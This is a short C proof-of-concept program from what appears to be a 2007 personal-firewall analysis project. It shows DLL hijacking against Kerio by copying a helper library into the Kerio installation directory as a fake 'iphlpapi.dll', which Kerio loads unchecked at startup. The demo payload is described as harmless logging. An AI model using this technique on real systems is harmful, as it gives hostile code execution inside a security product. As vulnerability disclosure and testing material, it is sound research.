/*

 Testing program for Fake 'iphlpapi' DLL injection (BTP00002P001SK)
 

 Usage:
 prog INSTPATH
   INSTPATH - Kerio installation directory

 Description:
 This program demonstrates the possibility of installation of a fake "iphlpapi.dll" to Kerio processes.
 The exploitation of this vulnerability is inconspicuous for common user even if the fake DLL does not simulate
 the functionality of original "iphlpapi.dll". Helper library called "testdll.dll" is copied to the installation directory 
 of Kerio and renamed to "iphlpapi.dll". Because Kerio loads this DLL dynamically using LoadLibrary API and does 
 not check the origin of the loaded module, it loads our library instead of the original "iphlpapi.dll" during its startup.
 When "testdll.dll" is loaded, it creates extra thread that can execute a malicious code. In this demostration 
 the malicious code is simulated by a harmless code that logs messages to a file.

 Test:
 Running the testing program and system reboot.

*/

#include <stdio.h>
#include <windows.h>


void about(void)
{
  printf("Testing program for Fake 'iphlpapi' DLL injection (BTP00002P001SK)\n");
  printf("Windows Personal Firewall analysis project\n");
  printf("Copyright 2007 by Matousec - Transparent security\n");
  printf("http://www.matousec.com/""\n\n");
  return;
}

void usage(void)
{
  printf("Usage: test INSTPATH\n"
         "  INSTPATH - Kerio installation directory\n");
  return;
}

void print_last_error()
{
  LPTSTR buf;
  DWORD code=GetLastError();
  if (FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,NULL,code,0,(LPTSTR)&buf,0,NULL))
  {
    fprintf(stderr,"Error code: %ld\n",code);
    fprintf(stderr,"Error message: %s",buf);
    LocalFree(buf);
  } else fprintf(stderr,"Unable to format error message for code %ld.\n",code);
  return;
}


int main(int argc,char **argv)
{
  about();

  if (argc!=2)
  {
    usage();
    return 1;
  }

  char testdll_new[MAX_PATH];
  snprintf(testdll_new,MAX_PATH,"%s\\iphlpapi.dll",argv[1]);

  if (CopyFile("testdll.dll",testdll_new,FALSE))
  {
    printf("\"testdll.dll\" copied to \"%s\".\n",testdll_new);
    printf("\nTEST SUCCESSFUL!\n");
    return 0;
  } 

  fprintf(stderr,"Unable to copy \"testdll.dll\" to \"%s\".\n",testdll_new);
  print_last_error();
  printf("\nTEST FAILED!\n");
  return 1;
}
                                  
